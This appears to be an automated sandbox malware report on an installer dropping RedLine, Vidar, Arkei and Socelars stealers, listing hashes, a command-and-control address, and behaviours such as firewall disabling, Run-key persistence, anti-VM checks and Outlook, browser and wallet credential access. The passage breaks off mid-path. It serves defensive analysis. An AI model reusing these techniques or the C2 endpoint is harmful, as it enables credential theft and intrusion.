Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
763s -
max time network
1167s -
platform
windows11_x64 -
resource
win11 -
submitted
08-10-2021 05:38
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
redline
media214
91.121.67.60:2151
Signatures
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3184 4840 rundll32.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7096 4840 rundll32.exe 39 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral4/memory/2776-304-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/2776-306-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5176-605-0x00000000050A0000-0x00000000056B8000-memory.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1bf-187.dat family_socelars behavioral4/files/0x000100000002b1bf-219.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 23 IoCs
description pid Process procid_target PID 4640 created 4296 4640 WerFault.exe 103 PID 4040 created 3408 4040 WerFault.exe 109 PID 2716 created 2532 2716 WerFault.exe 122 PID 4868 created 3332 4868 WerFault.exe 97 PID 2192 created 1068 2192 WerFault.exe 107 PID 2616 created 6120 2616 WerFault.exe 177 PID 4240 created 6132 4240 4944009.scr 176 PID 5612 created 5272 5612 WerFault.exe 149 PID 1472 created 5700 1472 WerFault.exe 173 PID 2976 created 5300 2976 WerFault.exe 179 PID 2064 created 5428 2064 WerFault.exe 300 PID 6804 created 5492 6804 WerFault.exe 157 PID 3124 created 2452 3124 WerFault.exe 270 PID 6240 created 6048 6240 WerFault.exe 266 PID 6208 created 4788 6208 WerFault.exe 434 PID 5464 created 6088 5464 Process not Found 297 PID 7080 created 3104 7080 WerFault.exe 331 PID 4788 created 7068 4788 Conhost.exe 340 PID 6100 created 3148 6100 WerFault.exe 342 PID 4808 created 1744 4808 WerFault.exe 343 PID 2184 created 6452 2184 WerFault.exe 382 PID 5748 created 5956 5748 WerFault.exe 420 PID 5176 created 2208 5176 Calculator.exe 407 -
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral4/memory/5376-514-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei behavioral4/memory/5448-643-0x0000000000400000-0x0000000005487000-memory.dmp family_arkei -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral4/memory/3408-269-0x0000000004B60000-0x0000000004C36000-memory.dmp family_vidar behavioral4/memory/5300-546-0x0000000004C00000-0x0000000004CD6000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x000100000002b1b3-159.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b4-157.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b3-158.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b6-164.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b6-163.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b4-162.dat aspack_v212_v242 -
Blocklisted process makes network request 6 IoCs
flow pid Process 426 5044 MsiExec.exe 429 5044 MsiExec.exe 434 5044 MsiExec.exe 435 5044 MsiExec.exe 462 456 powershell.exe 463 456 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Adam.exe -
Executes dropped EXE 64 IoCs
pid Process 2340 setup_installer.exe 2512 setup_install.exe 3332 Thu16205451b994.exe 2824 Thu166f9a8bbe80.exe 3108 Thu167d514d2a7ac5a.exe 3360 Thu161580bf75.exe 3408 Thu1628aafb3efd7c3d.exe 4000 Thu16f584bd3686.exe 4296 Thu16466b26f8b7.exe 1068 Thu165bd34b1e1d4d81.exe 1444 Thu16f3de88a335950bb.exe 1520 Thu164ba03be19.exe 2932 Thu1653d94a8da.exe 2380 Thu16f3de88a335950bb.tmp 3400 Thu16f3de88a335950bb.exe 4852 Thu16f3de88a335950bb.tmp 3152 FrtT6nDxGGNaNQJGpSMuoIte.exe 772 09xU.exE 1772 Thu164ba03be19.exe 2492 5748237.scr 2452 8871820.scr 2776 timeout.exe 3740 4387696.scr 4240 4944009.scr 3620 FarLabUninstaller.exe 2264 NDP472-KB4054531-Web.exe 5248 ZDZw711lIB8y64BEIB3m6gJV.exe 5260 y1G8FfzF7rmhnTW5xkTk4_xz.exe 5272 bdaapMn77MgXIJD9NqZPKirz.exe 5376 qBm1tEm07kjon3FOZ_6bAk3D.exe 5436 DxgHi7mCO9PoXuB9zH8BNOwz.exe 5456 _9SCB5TlxeO2mPfwxR05MOev.exe 5448 4rvzzQeAzGVDBMspVvuZ1t25.exe 5428 Conhost.exe 5472 gC0KbqHO3ZDxpp0jTvhCiFii.exe 5492 rq8aNCX_7GMzisMtY3v4FnzZ.exe 5504 2Y0ax0F0iaoZKWHLwz824FmR.exe 5516 7wnnfVqm38XiveMNr17rrIJW.exe 5536 JEi0h6D_gt3gktq40Td8HXMD.exe 5548 uLAUkLkggV2s3Qgdg9_4e6DG.exe 5564 8907188.scr 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5880 mL5RRfi8cNocBGUfqcRH0wRT.exe 6120 XgEEoNZF6CBCJXeGL_a9D1b2.exe 6132 surHKlFIOl98IaTC679RP8rQ.exe 4732 mSngUReAgA5wzBQ9dhAfBrS5.exe 4328 Setup.exe 1244 tmpA682_tmp.exe 4696 EprQIfWVrwBTpRY1DxBx2pcO.exe 1556 lAbjHswwfcK8SfQWhuS3AA4p.exe 5300 d_EYXTwqXMHtpnR8ybSMhjSy.exe 5320 DR5vEkjduzexsi7Qja2_MjnT.exe 3228 UNPgDYBJfd6kF2hyuwASzsYz.exe 4484 1625681.scr 1172 WerFault.exe 5772 ROTvtAkvU5hsf3cGIbnsGJit.exe 1904 cm3.exe 5864 LW3X5qRkhDyQXyj0a9LDsZyP.tmp 6028 DownFlSetup999.exe 3436 ZDZw711lIB8y64BEIB3m6gJV.exe 5176 WerFault.exe 2236 WinHoster.exe 1844 2483327.scr 4240 4944009.scr -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tmpA682_tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8460512.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3313489.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4387696.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _9SCB5TlxeO2mPfwxR05MOev.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _9SCB5TlxeO2mPfwxR05MOev.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4D35.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DR5vEkjduzexsi7Qja2_MjnT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4387696.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JEi0h6D_gt3gktq40Td8HXMD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JEi0h6D_gt3gktq40Td8HXMD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8907188.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5787138.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5787138.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uLAUkLkggV2s3Qgdg9_4e6DG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mSngUReAgA5wzBQ9dhAfBrS5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8460512.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion filename.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8907188.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tmpA682_tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3313489.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4D35.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2699551.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DR5vEkjduzexsi7Qja2_MjnT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uLAUkLkggV2s3Qgdg9_4e6DG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DxgHi7mCO9PoXuB9zH8BNOwz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mSngUReAgA5wzBQ9dhAfBrS5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DxgHi7mCO9PoXuB9zH8BNOwz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion filename.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2699551.scr -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk filename.exe -
Loads dropped DLL 64 IoCs
pid Process 2512 setup_install.exe 2512 setup_install.exe 2512 setup_install.exe 2512 setup_install.exe 2512 setup_install.exe 2380 Thu16f3de88a335950bb.tmp 4852 Thu16f3de88a335950bb.tmp 2532 rundll32.exe 4328 Setup.exe 4328 Setup.exe 5376 qBm1tEm07kjon3FOZ_6bAk3D.exe 1280 rundll32.exe 5448 4rvzzQeAzGVDBMspVvuZ1t25.exe 3144 RegSvcs.exe 7044 rundll32.exe 3144 RegSvcs.exe 3144 RegSvcs.exe 5864 LW3X5qRkhDyQXyj0a9LDsZyP.tmp 4356 rundll32.exe 5000 NAN.exe 6228 rundll32.exe 6608 rundll32.exe 6864 explorer.exe 5408 Calculator%20Installation.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 1540 MsiExec.exe 1540 MsiExec.exe 3604 MsiExec.exe 3604 MsiExec.exe 1116 autosubplayer.exe 5044 MsiExec.exe 5956 rundll32.exe 5044 MsiExec.exe 1116 autosubplayer.exe 5044 MsiExec.exe 5044 MsiExec.exe 5044 MsiExec.exe 5044 MsiExec.exe 5044 MsiExec.exe 5044 MsiExec.exe 5044 MsiExec.exe 5044 MsiExec.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 1116 autosubplayer.exe 4268 Calculator%20Installation.exe 4268 Calculator%20Installation.exe 4268 Calculator%20Installation.exe 4268 Calculator%20Installation.exe 6276 Calculator.exe 4268 Calculator%20Installation.exe 4268 Calculator%20Installation.exe 6276 Calculator.exe 6276 Calculator.exe 5428 Calculator.exe 7028 Calculator.exe 7028 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000300000001e609-313.dat themida behavioral4/memory/3740-340-0x0000000000CA0000-0x0000000000CA1000-memory.dmp themida -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegSvcs.exe -
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook RegSvcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --DzBsjyZ8js" Calculator%20Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" ocpOgOZkWULXx7YjUS5ZFbBf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Lozhydizhify.exe\"" Adam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Calculator%20Installation.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uLAUkLkggV2s3Qgdg9_4e6DG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3313489.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5787138.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2699551.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DR5vEkjduzexsi7Qja2_MjnT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mSngUReAgA5wzBQ9dhAfBrS5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JEi0h6D_gt3gktq40Td8HXMD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8907188.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tmpA682_tmp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8460512.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA filename.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4D35.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4387696.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DxgHi7mCO9PoXuB9zH8BNOwz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _9SCB5TlxeO2mPfwxR05MOev.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\Q: Calculator%20Installation.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\U: Calculator%20Installation.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\B: Calculator%20Installation.exe File opened (read-only) \??\P: Calculator%20Installation.exe File opened (read-only) \??\A: Calculator%20Installation.exe File opened (read-only) \??\F: Calculator%20Installation.exe File opened (read-only) \??\G: Calculator%20Installation.exe File opened (read-only) \??\M: Calculator%20Installation.exe File opened (read-only) \??\V: Calculator%20Installation.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\W: Calculator%20Installation.exe File opened (read-only) \??\Z: Calculator%20Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\X: Calculator%20Installation.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\I: Calculator%20Installation.exe File opened (read-only) \??\S: Calculator%20Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: Calculator%20Installation.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: Calculator%20Installation.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\L: Calculator%20Installation.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\O: Calculator%20Installation.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\J: Calculator%20Installation.exe File opened (read-only) \??\T: Calculator%20Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\R: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 181 ipinfo.io 378 ip-api.com 2 ip-api.com 2 ipinfo.io 38 ipinfo.io 89 ipinfo.io 149 ipinfo.io 176 ipinfo.io -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
pid Process 3740 4387696.scr 5436 DxgHi7mCO9PoXuB9zH8BNOwz.exe 5536 JEi0h6D_gt3gktq40Td8HXMD.exe 5548 uLAUkLkggV2s3Qgdg9_4e6DG.exe 5456 _9SCB5TlxeO2mPfwxR05MOev.exe 5564 8907188.scr 1244 tmpA682_tmp.exe 4732 mSngUReAgA5wzBQ9dhAfBrS5.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 5036 8460512.scr 3160 3313489.scr 6088 filename.exe 6124 5787138.scr 1616 4D35.exe 5372 2699551.scr 5320 DR5vEkjduzexsi7Qja2_MjnT.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 1520 set thread context of 2776 1520 Thu164ba03be19.exe 132 PID 5248 set thread context of 3436 5248 ZDZw711lIB8y64BEIB3m6gJV.exe 199 PID 5700 set thread context of 5176 5700 FaeWm8lHfr6EdlurtOcFMbhn.exe 423 PID 5504 set thread context of 1340 5504 2Y0ax0F0iaoZKWHLwz824FmR.exe 366 PID 3228 set thread context of 2092 3228 UNPgDYBJfd6kF2hyuwASzsYz.exe 248 PID 5880 set thread context of 3144 5880 mL5RRfi8cNocBGUfqcRH0wRT.exe 243 PID 1556 set thread context of 3596 1556 lAbjHswwfcK8SfQWhuS3AA4p.exe 250 PID 4484 set thread context of 5652 4484 1625681.scr 272 PID 6000 set thread context of 6856 6000 L4ZFOrOoGmodzzY1lFutmoS6.exe 277 PID 724 set thread context of 1244 724 tmpA682_tmp.exe 313 PID 4868 set thread context of 1176 4868 462.exe 326 PID 5512 set thread context of 3380 5512 EE1A.exe 333 PID 1468 set thread context of 5020 1468 9D1E.exe 353 PID 1468 set thread context of 6864 1468 9D1E.exe 355 PID 5632 set thread context of 4080 5632 NAN.exe 409 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\MSBuild\Lozhydizhify.exe Adam.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\FarLabUninstaller\is-JN5FP.tmp Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\regstr autosubplayer.exe File created C:\Program Files 